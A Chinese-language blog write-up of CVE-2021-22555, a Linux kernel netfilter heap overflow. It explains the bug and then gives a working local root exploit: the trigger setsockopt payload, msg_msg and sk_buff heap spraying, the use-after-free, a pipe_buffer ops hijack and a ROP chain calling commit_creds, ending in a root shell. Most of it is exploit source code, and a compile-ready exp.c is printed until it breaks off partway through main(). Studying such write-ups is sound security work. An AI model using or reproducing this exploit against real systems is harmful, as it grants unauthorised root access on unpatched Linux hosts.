CVE-2021-22555

发表于 2022-03-31 分类于 kernel 阅读次数：本文字数： 27k 阅读时长 ≈ 25 分钟

从4字节堆溢出写0到UAF，再到提权，该 linux kernel 漏洞的利用思路非常值得学习
exploit

环境准备

漏洞影响的版本范围比较广的，根据google security-research 描述，已经 patch 的版本有 5.12，5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267

这里偷懒选择已有的环境:
https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-22555

该内核版本为 5.11.14，稍后也以这个版本的源码来解析

漏洞分析

当在 64 位 linux 下，兼容运行 32 位程序，调用 setsockopt(sockfd, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data))时，内核会先调用 translate_compat_table 将 xt_table_info 32 位下的结构体转存储为 64 位模式的结构体：

/* The table itself */
struct xt_table_info {
	/* Size per table */
	unsigned int size;
	/* Number of entries: FIXME. --RR */
	unsigned int number;
	/* Initial number of entries. Needed for module usage count */
	unsigned int initial_entries;

	/* Entry points and underflows */
	unsigned int hook_entry[NF_INET_NUMHOOKS];
	unsigned int underflow[NF_INET_NUMHOOKS];

	/*
	 * Number of user chains. Since tables cannot have loops, at most
	 * @stacksize jumps (number of user chains) can possibly be made.
	 */
	unsigned int stacksize;
	void ***jumpstack;

	unsigned char entries[] __aligned(8);
};

其中 entries 字段指向的是由 ipt_entry 结构体组成的数组:

struct ipt_entry {
	struct ipt_ip ip;

	/* Mark with fields that we care about. */
	unsigned int nfcache;

	/* Size of ipt_entry + matches */
	__u16 target_offset;
	/* Size of ipt_entry + matches + target */
	__u16 next_offset;

	/* Back pointer */
	unsigned int comefrom;

	/* Packet and byte counters. */
	struct xt_counters counters;

	/* The matches (if any), then the target. */
	unsigned char elems[0];
};

其中的 target_offset 是相对于 ipt_entry 的偏移，指向了一个 xt_entry_target 结构体:

struct xt_entry_target {
	union {
		struct {
			__u16 target_size;

			/* Used by userspace */
			char name[XT_EXTENSION_MAXNAMELEN];
			__u8 revision;
		} user;
		struct {
			__u16 target_size;

			/* Used inside the kernel */
			struct xt_target *target;
		} kernel;

		/* Total length */
		__u16 target_size;
	} u;

	unsigned char data[0];
};

漏洞出在 translate_compat_table 调用的 xt_compat_target_from_user，调用 memset(t->data + target->targetsize, pad) 对齐空间清零

void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
				unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;
	char name[sizeof(t->u.user.name)];

	t = *dstptr;
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);

	tsize += off;
	t->u.user.target_size = tsize;
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;
}

而在 translate_compat_table 调用 xt_alloc_table_info 处，对 size 的计算并没有 target->targetsize 的参与，而仅在 check_compat_entry_size_and_hooks 里，加上了为了对齐 matchsize 和 targetsize 的共 8 字节的大小，因此导致越界写 0 的效果

IPT_SO_SET_REPLACE 需要 CAP_NET_ADMIN 权限，但是这个权限可以在新建 user、network 的命名空间里获得

漏洞利用

xt_table_info

根据源码，可以分析出 xt_table_info 结构体的布局，如下图：

其中 match 和 target 的 data 字段都是大小可变的，转存储后，给 match 和 target 都加上的 4 字节的补齐，然后就是越界 memset 了

控制 targetsize

通过控制 targetsize ，则可以控制越界写 0，但是这个 targetsize 不能直接控制，通过选择不同的 target，对应不同的 targetsize，可以越界最多 0x4c 个字节，target 的选择在以下的调用链中check_compat_entry_size_and_hooks -> xt_request_find_target -> xt_find_target

static struct xt_target *xt_find_target(u8 af, const char *name, u8 revision)
{
	struct xt_target *t;
	int err = -ENOENT;

	if (strnlen(name, XT_EXTENSION_MAXNAMELEN) == XT_EXTENSION_MAXNAMELEN)
		return ERR_PTR(-EINVAL);

	mutex_lock(&xt[af].mutex);
	list_for_each_entry(t, &xt[af].target, list) {
		if (strcmp(t->name, name) == 0) {
			if (t->revision == revision) {
				if (try_module_get(t->me)) {
					mutex_unlock(&xt[af].mutex);
					return t;
				}
			} else
				err = -EPROTOTYPE; /* Found something. */
		}
	}
	mutex_unlock(&xt[af].mutex);

	if (af != NFPROTO_UNSPEC)
		/* Try searching again in the family-independent list */
		return xt_find_target(NFPROTO_UNSPEC, name, revision);

	return ERR_PTR(err);
}

google security-research 中的 poc 所使用的 NFLOG，在 nfqueue_tg_init 中注册到 xt 变量里：

static struct xt_target nfqueue_tg_reg[] __read_mostly = {
	{
		.name		= "NFQUEUE",
		.family		= NFPROTO_UNSPEC,
		.target		= nfqueue_tg,
		.targetsize	= sizeof(struct xt_NFQ_info),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 1,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v1,
		.targetsize	= sizeof(struct xt_NFQ_info_v1),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 2,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v2,
		.targetsize	= sizeof(struct xt_NFQ_info_v2),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 3,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v3,
		.targetsize	= sizeof(struct xt_NFQ_info_v3),
		.me		= THIS_MODULE,
	},
};

可以看到这个 xt_NFQ_info_v1 结构体，只有 4 个字节，也就是 targetsize 为 4 个字节，计算得 pad = 4：

struct xt_NFQ_info_v1 {
	__u16 queuenum;
	__u16 queues_total;
};

这样就可以越界写 4 字节的 0，通过调整 t->data 的位置，可以让其改写某些指针的低两字节，后面的利用中，就让这两字节改指针转化为 UAF 进行权限提升

2 字节溢出写 0

选择 xt_NFQ_info_v1，则可以 memset 4 个字节，可以想到的是，溢出写 0 用来改写某些结构体的指针来进一步利用，比如说 msg_msg.m_list.next 指针，但是改写指针低 4 个字节为 0 很可能不会得到一个有效的指针，所以需要做一下调整，只改指针低两字节则很可能得到一个有效的指针

通过调整 match 的 data 部分的大小，让 xt_table_info 结构体从一个页也就是 4K 大小中分配，并且 memset 刚好改写相邻的下一个页的低两字节，有具体如下：

int trigger_oob_write(int s)
{
    struct __attribute__((__packed__))
    {
        struct ipt_replace replace;  // 0x5c
        struct ipt_entry entry;      // 0x70
        struct xt_entry_match match; // 0x20
        char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
        struct xt_entry_target target; // 0x20
    } data = {0};

    data.replace.num_counters = 1;
    data.replace.num_entries = 1;
    data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                         sizeof(data.match_data) + sizeof(data.target)); 

    data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                              sizeof(data.match_data) + sizeof(data.target)); 
    data.entry.target_offset =
        (sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data)); 

    data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data)); 
    strcpy(data.match.u.user.name, "icmp");
    data.match.u.user.revision = 0;

    data.target.u.user.target_size = sizeof(data.target); // 0x20
    strcpy(data.target.u.user.name, "NFQUEUE");
    data.target.u.user.revision = 1;

    // Partially overwrite the adjacent buffer with 2 bytes of zero.
    if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
    {
        if (errno == ENOPROTOOPT)
        {
            printf("[-] error ip_tables module is not loaded.\n");
            return -1;
        }
    }

    return 0;
}

此时 memset 如下：

memset(t->data + target->targetsize, 0, 4);
->
memset(newinfo->entries + target_offset + 0x20(offset of data == sizeof(xt_entry_target)) + 4(target->targetsize), 0, 4);
->
memset(newinfo + 0x40 + target_offset + 0x20 + 4, 0, 4);
->
memset(newinfo + 0x40 + 0x70(sizeof ipt_entry) + 0x20(sizeof xt_entry_match) + match_data + 4(align matchsize) + 0x20 + 4, 0, 4)
->
memset(newinfo + PAGE_SIZE - 8 - 2 + 4(align matchsize) + 4(target->targetsize), 0, 4)
->
memset(newinfo + PAGE_SIZE - 2, 0, 4)

off-by-2null

UAF

构造主消息与副消息

创建 4096 个消息队列，填充 0x1000 大小的主消息

struct
{
    long mtype;
    char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
...

int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
    *(long *)msgp = msgtyp;
    if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0) {
        perror("[-] msgsnd");
        return -1;
    }

    return 0;
}
...

    puts("[*] Spraying primary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&msg_primary, 0, sizeof(msg_primary));
        *(int *)&msg_primary.mtext[0] = MSG_TAG;
        *(int *)&msg_primary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) {
            goto ret;
        }
    }

再填充大小为 0x400 的副消息：

struct
{
    long mtype;
    char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
...

    puts("[*] Spraying secondary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
            goto ret;
    }

Copy 一张图，如下：
messages
注意：图中的 next 指 msg_msg->m_list->next 而不是 msg_msg->next

其中的 *(int *)&mtext[0] = MSG_TAG 用来标记该区域是消息内容区域，*(int *)&mtext[4] = i 用来标记好这个消息是哪个消息队列的消息，当漏洞触发时，next 指向改变，则主消息和副消息的 *(int *)&mtext[4] 值不一样，这样可以找到是哪个 msg_msg 结构体被更改了

制造空洞为 xt_table_info 占位做准备

间隔 1024，释放部分主消息，使得后面 xt_table_info 分配到这些空洞中

int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}
...

    puts("[*]  Creating holes in primary messages...");
    for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
    {
        if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
            goto ret;
    }

再 Copy 一张图：
free

触发漏洞，搜索被破坏的主消息

触发 2 字节溢出写 0 后，更改了某个 msg_msg 的 m_list.next 指针，也就是副消息会指向其他地方，很可能就是另外某个主消息的副消息，利用 msgrcv 的 MSG_COPY 标志读取副消息，而不释放副消息，对比主副消息的 *(int *)&mtext[4] 是否一致，即可找到目标消息队列：

int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}
...

    puts("[*] Trigger oob write");
    if (trigger_oob_write(s) < 0) {
        perror("trigger_oob_write");
        goto ret;
    }

    puts("[*] Searching for corrupted primary message...");
    int fake_id = -1, real_id = -1;
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (i != 0 && !(i % HOLE_STEP))
            continue;

        if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
            goto ret;

        if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
        {
            printf("[-] MSG_TAG error\n");
            goto ret;
        }

        if (*(int *)&msg_secondary.mtext[4] != i)
        {
            real_id = *(int *)&msg_secondary.mtext[4];
            fake_id = i;
            break;
        }
    }

    if (real_id == -1 && fake_id == -1)
    {
        printf("[-] Could not corrupt any primary message\n");
        goto ret;
    }

    printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);

如图：
corrupt

释放副消息造成 UAF

利用 real_id 读取释放副消息，fake_id 的副消息指向已经释放的消息，则造成 UAF

puts("[*] Free secondary message and then gain UAF");
if (read_msg(real_id, &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
    goto ret;

如图：
trigger UAF

有了 UAF 后，这里大致描述下利用思路

skb 堆喷占位，伪造副消息
fake_id peek 副消息来 leak 堆地址
释放 skb ，利用 leak 出的堆地址来 skb 堆喷伪造合法的副消息
fake_id read 释放副消息，因为此时副消息的指针都合法可以脱链
pipe_buffer 堆喷占位
读取并释放 skb，读到 pipe_buffer 的内容，泄露 kernel 地址
skb 堆喷劫持 pipe_buffer->ops
close pipe，劫持程序执行流提权

skb 堆喷伪造副消息

首先得先泄露堆地址，用于后面伪造合法的副消息

leak heap

利用 skb 堆喷伪造副消息，伪造 m_ts，利用 fake_id 队列 peek 副消息，即可越界读到相邻的副消息的 msg_msg 结构体，可以泄露 msg_msg->m_list->next 和 msg_msg->m_list->prev 堆地址

struct msg_msg
{
    uint64_t m_list_next;
    uint64_t m_list_prev;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
};

struct
{
    long mtype;
    char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
...

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
    msg->m_list_next = m_list_next;
    msg->m_list_prev = m_list_prev;
    msg->m_type = MTYPE_FAKE;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = 0;
}

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (write(ss[i][0], buf, size) < 0)
            {
                perror("[-] write");
                return -1;
            }
        }
    }
    return 0;
}
...

    int ss[NUM_SOCKETS][2];
    char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
    char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
    struct msg_msg *msg;
    uint64_t kheap;
...

    puts("[*] Free secondary message and then gain UAF");
    if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking adjacent secondary message...");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak adjacent secondary message");
        goto ret;
    }

    msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
    kheap = msg->m_list_next; // kheap pointer to the primary message
    if (kheap & (PRIMARY_SIZE - 1))
        kheap = msg->m_list_prev;
    printf("[+] kheap = %#" PRIx64 "\n", kheap);

此时的 kheap 就是相邻副消息的 m_list->next 或者 m_list->prev，指向的就是他对应的主消息
leak kheap

leak address of msg_fake

释放 skb，然后伪造 msg_msg->next=kheap-MSG_MSGSEG_SIZE，也就是让这个主消息成为这个副消息的 msg_msgseg 结构，这样读取副消息的时候，就能把这个主消息也读出来，就能读到 m_list->next 也就是 fake_msg 相邻副消息的地址，减去 SECONDARY_SIZE 就是 msg_fake 的地址：


puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto ret;

if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
    printf("[-] Could not leak address of msg_fake\n");
    goto ret;
}

msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE-MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
    msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);

伪造合法副消息并释放，构造 skb 可控的 UAF

有了 msg_fake 的地址，只要让 msg_fake->m_list->next = msg_fake_addr，随后释放副消息即可成功脱链，留下一块 skb 指向的 free 掉的内存：

puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto ret;

大概就像这样
UAF2

skb & pipe_buffer 的 UAF 利用思路

leak kernel base

堆喷 pipe_buffer，利用 skb read 泄露 ops 指针，计算出 kernel 基址：


puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
    if (pipe(pipefd[i]) < 0)
    {
        perror("[-] pipe");
        goto ret;
    }

    if (write(pipefd[i][1], "xi4oyu", 6) < 0)
    {
        perror("[-] write");
        goto ret;
    }
}

puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
    for (int j = 0; j < NUM_SKBUFFS; j++)
    {
        if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
        {
            perror("[-] read");
            goto ret;
        }

        if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE) {
            pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
            break;
        }
    }
}

kernel_offset  = pipe_buffer_ops - 0xffffffff8223e140;  // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);

hijack control follow

skb 堆喷伪造 pipe_buffer，劫持 ops 指针，劫持程序控制流，当关闭管道时，最后进入下面的函数释放 pipe_buffer，可知 rsi 指向 pipe_buffer，可以栈迁移到 pipe_buffer，随后 ROP

static inline void pipe_buf_release(struct pipe_inode_info *pipe,
				    struct pipe_buffer *buf)
{
	const struct pipe_buf_operations *ops = buf->ops;

	buf->ops = NULL;
	ops->release(pipe, buf);
}

ROP 执行 commit_creds(&init_cred) 提权，平衡栈最后回到用户态起 shell 即可，具体操作如下：

puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];

ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]

*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9;  // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0;  // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650;  // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780;  // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00;  // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc;  // mov rsp, rbp ; pop rbp ; ret

if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
    if (close(pipefd[i][0]) < 0)
    {
        perror("[-] close");
        goto ret;
    }
    if (close(pipefd[i][1]) < 0)
    {
        perror("[-] close");
        goto ret;
    }
}

system("/bin/sh");

exp

完整 exp 如下：

// gcc -m32 -static -o exp exp.c
#define _GNU_SOURCE
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <err.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter/x_tables.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <sched.h>
#include <inttypes.h>

#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400

#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 128
#define NUM_MSQIDS 4096

#define HOLE_STEP 1024

#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337

#define MSG_TAG 0xAAAAAAAA

#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))

struct msg_msg
{
    uint64_t m_list_next;
    uint64_t m_list_prev;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
};

struct msg_msgseg
{
    uint64_t next;
};

struct pipe_buffer
{
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t pad;
    uint64_t private;
};

struct pipe_buf_operations
{
    uint64_t confirm;
    uint64_t release;
    uint64_t steal;
    uint64_t get;
};

struct
{
    long mtype;
    char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;

struct
{
    long mtype;
    char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;

struct
{
    long mtype;
    char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;

void getRootShell(void)
{
    puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");

    if (getuid())
    {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        exit(-1);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell "
         "now...\033[0m");
    system("/bin/sh");
    exit(0); // to exit the process normally instead of segmentation fault
}

int trigger_oob_write(int s)
{
    struct __attribute__((__packed__))
    {
        struct ipt_replace replace;  // 0x5c
        struct ipt_entry entry;      // 0x70
        struct xt_entry_match match; // 0x20
        char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
        struct xt_entry_target target; // 0x20
    } data = {0};

    data.replace.num_counters = 1;
    data.replace.num_entries = 1;
    data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                         sizeof(data.match_data) + sizeof(data.target));

    data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                              sizeof(data.match_data) + sizeof(data.target));
    data.entry.target_offset =
        (sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));

    data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
    strcpy(data.match.u.user.name, "icmp");
    data.match.u.user.revision = 0;

    data.target.u.user.target_size = sizeof(data.target); // 0x20
    strcpy(data.target.u.user.name, "NFQUEUE");
    data.target.u.user.revision = 1;

    // Partially overwrite the adjacent buffer with 2 bytes of zero.
    if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
    {
        if (errno == ENOPROTOOPT)
        {
            printf("[-] error ip_tables module is not loaded.\n");
            return -1;
        }
    }

    return 0;
}

int setup_sandbox(void)
{
    if (unshare(CLONE_NEWUSER) < 0)
    {
        perror("[-] unshare(CLONE_NEWUSER)");
        return -1;
    }
    if (unshare(CLONE_NEWNET) < 0)
    {
        perror("[-] unshare(CLONE_NEWNET)");
        return -1;
    }

    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    if (sched_setaffinity(getpid(), sizeof(set), &set) < 0)
    {
        perror("[-] sched_setaffinity");
        return -1;
    }

    return 0;
}

int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
    *(long *)msgp = msgtyp;
    if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0)
    {
        perror("[-] msgsnd");
        return -1;
    }

    return 0;
}

int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}

int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
    msg->m_list_next = m_list_next;
    msg->m_list_prev = m_list_prev;
    msg->m_type = MTYPE_FAKE;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = 0;
}

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (write(ss[i][0], buf, size) < 0)
            {
                perror("[-] write");
                return -1;
            }
        }
    }
    return 0;
}

int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size)
{
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (read(ss[i][1], buf, size) < 0)
            {
                perror("[-] read");
                return -1;
            }
        }
    }
    return 0;
}

int main(int argc, char const *argv[])
{
    int s;
    int msqid[NUM_MSQIDS];
    int ss[NUM_SOCKETS][2];
    int pipefd[NUM_PIPEFDS][2];
    int fake_id = -1, real_id = -1;
    char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
    char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
    struct msg_msg *msg;
    uint64_t kheap = 0, msg_fake_addr = 0;
    uint64_t pipe_buffer_ops = 0, kernel_base = 0, kernel_offset = 0;
    struct pipe_buf_operations *ops;
    struct pipe_buffer *buf;
    int ridx = 0;
    uint64_t *rop;

    if (setup_sandbox() < 0)
        return -1;

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("socket");
        return -1;
    }

    for (int i = 0; i < NUM_PIPEFDS; i++)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0)
        {
            perror("socketpair");
            return -1;
        }
    }

    puts("[*] Setup message queues");
    memset(msqid, -1, sizeof(msqid));
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0)
        {
            goto ret;
        }
    }

    puts("[*] Spraying primary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_primary, 0, sizeof(msg_primary));
        *(int *)&msg_primary.mtext[0] = MSG_TAG;
        *(int *)&msg_primary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
        {
            goto ret;
        }
    }

    puts("[*] Spraying secondary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
            goto ret;
    }

    puts("[*]  Creating holes in primary messages...");
    for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
    {
        if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
            goto ret;
    }

    puts("[*] Trigger oob write");
    if (trigger_oob_write(s) < 0)
        goto ret;

    puts("[*] Searching for corrupted primary message...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (i != 0 && !(i % HOLE_STEP))
            continue;

        if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
            goto ret;

        if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
        {
            printf("[-] MSG_TAG error\n");
            goto ret;
        }

        if (*(int *)&msg_secondary.mtext[4] != i)
        {
            real_id = *(int *)&msg_secondary.mtext[4];
            fake_id = i;
            break;
        }
    }

    if (real_id == -1 && fake_id == -1)
    {
        printf("[-] Could not corrupt any primary message\n");
        goto ret;
    }

    printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);

    puts("[*] Free secondary message and then gain UAF");
